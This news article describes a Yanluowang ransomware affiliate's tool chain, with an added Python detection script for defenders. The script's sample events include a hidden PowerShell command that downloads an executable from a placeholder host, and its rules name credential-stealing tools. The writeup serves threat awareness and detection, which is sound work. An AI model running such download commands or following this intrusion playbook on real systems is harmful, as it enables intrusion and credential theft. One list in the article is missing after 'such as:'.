An affiliate of the recently discovered Yanluowang ransomware operation is focusing its attacks on U.S. organizations in the financial sector using BazarLoader malware in the reconnaissance stage.
Based on observed tactics, techniques, and procedures, the threat actor is experienced with ransomware-as-a-service (RaaS) operations and may be linked with the Fivehands group.
Researchers at Symantec, a division of Broadcom Software, note that the actor has been hitting higher-profile targets in the U.S. since at least August.
While its interest is in financial institutions, the Yanluowang ransomware affiliate has also targeted companies in the manufacturing, IT services, consultancy, and engineering sectors.
Looking at the tactics, techniques, and procedures (TTPs), the researchers noticed a possible connection to older attacks involving Thieflock, a ransomware operation developed by the Fivehands group.
Fivehands ransomware itself is relatively new on the scene, becoming known in April – first in a report from Mandiant, who is tracking its developer as UNC2447, and then in an alert from CISA.
At the time, Mandiant said that UNC2447 showed “advanced capabilities to evade detection and minimize post-intrusion forensics,” and that its affiliates had been deploying RagnarLocker ransomware.
Symantec notes that the link found between recent Yanluowang attacks and older ones with Thieflock is tentative, as it relies on several TTPs found in Fivehands ransomware attacks, such as:
“This link begs the question of whether Yanluowang was developed by Canthroid [a.k.a. Fivehands]. However, analysis of Yanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely hypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate,” the researchers say.
After gaining access to the target network, the attacker uses PowerShell to download tools, such as the BazarLoader malware, to help with lateral movement.
BazarLoader is delivered to corporate targets by the TrickBot botnet, which also spreads Conti ransomware. More recently, TrickBot operators started helping to rebuild the Emotet botnet.
The Yanluowang threat actor enables Remote Desktop (RDP) through the registry and installs the ConnectWise tool for remote access.
The researchers say that the affiliate discovers systems of interest with the AdFind tool, used to query Active Directory, and with SoftPerfect Network Scanner, used to find hostnames and network services.
Several tools are used to steal credentials from the browsers (Firefox, Chrome, Internet Explorer) of compromised machines: GrabFF, GrabChrome, BrowserPassView.
Symantec’s researchers also noticed that the attacker used KeeThief to steal the master key for the KeePass password manager, a screen capture tool, and the data exfiltration utility Filegrab.
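A defender-side check for the tool chain described above, as an added example that is not part of the article or of Symantec's report: it runs a handful of case-insensitive regex rules over constructed, simplified process-creation and registry events and reports which stages of the affiliate's playbook appear on a host. The event format, the binary names, and the registry value used to enable RDP are my assumptions, not values taken from the article.

```python
import re
from typing import Dict, List

# Rules keyed to the tooling the article attributes to the Yanluowang affiliate.
# Each pattern is matched case-insensitively against one flattened event line.
# Binary names and the registry path are assumptions about how these tools
# typically surface in endpoint telemetry, not indicators from the article.
RULES: Dict[str, str] = {
    "powershell_download":  r"powershell.*(invoke-webrequest|iwr\b|downloadstring|downloadfile)",
    "rdp_enabled_registry": r"terminal server\\fdenytsconnections\|value=0",
    "remote_access_tool":   r"connectwise|screenconnect",
    "ad_recon_adfind":      r"\badfind\.exe",
    "net_scan_softperfect": r"\bnetscan\.exe",
    "browser_cred_theft":   r"grabff|grabchrome|browserpassview",
    "keepass_cred_theft":   r"keethief",
}

# Constructed sample events in the form "EventType|field=value|field=value".
SAMPLE_EVENTS: List[str] = [
    "ProcessCreate|image=powershell.exe|cmdline=powershell -nop -w hidden -c Invoke-WebRequest http://loader.example.invalid/s.exe -OutFile C:\\Users\\Public\\s.exe",
    "RegistrySet|key=HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections|value=0",
    "ProcessCreate|image=msiexec.exe|cmdline=msiexec /i C:\\Users\\Public\\ConnectWise.ClientSetup.msi /q",
    "ProcessCreate|image=adfind.exe|cmdline=adfind.exe -f objectcategory=computer",
    "ProcessCreate|image=netscan.exe|cmdline=netscan.exe",
    "ProcessCreate|image=GrabChrome.exe|cmdline=GrabChrome.exe",
    "ProcessCreate|image=powershell.exe|cmdline=powershell -c Import-Module .\\KeeThief.ps1",
    "ProcessCreate|image=notepad.exe|cmdline=notepad.exe C:\\Users\\alice\\notes.txt",
]


def scan_events(events: List[str]) -> Dict[str, List[int]]:
    """Return, for every rule that fired, the indices of the matching event lines."""
    hits: Dict[str, List[int]] = {}
    for idx, line in enumerate(events):
        low = line.lower()
        for name, pattern in RULES.items():
            if re.search(pattern, low):
                hits.setdefault(name, []).append(idx)
    return hits


def chain_score(hits: Dict[str, List[int]]) -> int:
    """Count distinct stages seen. One tool alone is weak evidence; several of
    them on the same host in a short window is the pattern the report describes."""
    return len(hits)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for rule, indices in found.items():
        print(f"{rule:22s} events {indices}")
    print(f"stages observed: {chain_score(found)} of {len(RULES)}")
```

In a real deployment the same rules would be applied per host over a time window, with the stage count driving alert severity rather than any single match.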
In a previous report about Yanluowang attacks, the company said that the hackers threatened with distributed denial-of-service (DDoS) and data wiping attacks if the victim did not comply with the demands.
Today’s report on the Yanluowang affiliate includes indicators of compromise for the tools and malware used in the attack.